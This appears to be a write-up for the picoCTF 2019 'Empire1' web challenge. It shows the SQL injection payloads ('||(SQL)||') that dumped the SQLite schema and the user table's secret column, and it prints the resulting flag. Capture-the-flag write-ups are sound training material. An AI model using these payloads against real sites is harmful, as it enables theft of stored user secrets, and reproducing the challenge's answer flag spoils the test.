SWE Books🕋 MastodonTwitter 🐦Github 🐙Buy me a ☕

Empire1

Point: 400

Category

Web Exploitation

Question

Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/37779/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:37779

Hint

  • Pay attention to the feedback you get

  • There is very limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.

  • The database gets reverted every 2 hours if you do break it, just come back later

Solution

After registered and signed in, we've seen a nav bar with Add a Todo, Your Todos, Employee Listing. It doesn't seem to contain any vulnerability.

Trying to add something to TODO, we've got this

<h1 class="page-header">Things You Gotta Do</h1>
    <ul class="list-unstyled">    
    <div class="row">
        <div class="col-md-6">
            <div class="well well-sm">
                <li>
                <strong>Very Urgent:</strong> Hello
                </li> 
            </div>
        </div>
    </div>

We've seen The "Very Urgent:" prefix is automatically prepended to any text provided by the user. After trying different strategies, I found that the page is vulnerable to SQL injection using the following syntax: '||(SQL)||'

The first time, I've tried with ' || (SELECT group_concat(sql) FROM sqlite_master) || ', then we got this

CREATE TABLE user ( id INTEGER NOT NULL, username VARCHAR(64), name VARCHAR(128), password_hash VARCHAR(128), secret VARCHAR(128), admin INTEGER, PRIMARY KEY (id) ),CREATE UNIQUE INDEX ix_user_username ON user (username),CREATE TABLE todo ( id INTEGER NOT NULL, item VARCHAR(256), user_id INTEGER, PRIMARY KEY (id), FOREIGN KEY(user_id) REFERENCES user (id) )

I saw secret VARCHAR(128), then I tried ' || (SELECT group_concat(secret) FROM user) || '. BOOM!, go to Your Todos tab, we got the flag Very Urgent: Likes Oreos.,Know it all.,picoCTF{wh00t_it_a_sql_injecta4dfbd62}

Flag

picoCTF{wh00t_it_a_sql_injecta4dfbd62}

PreviouslogonNextJava-Script-Kiddie

Last updated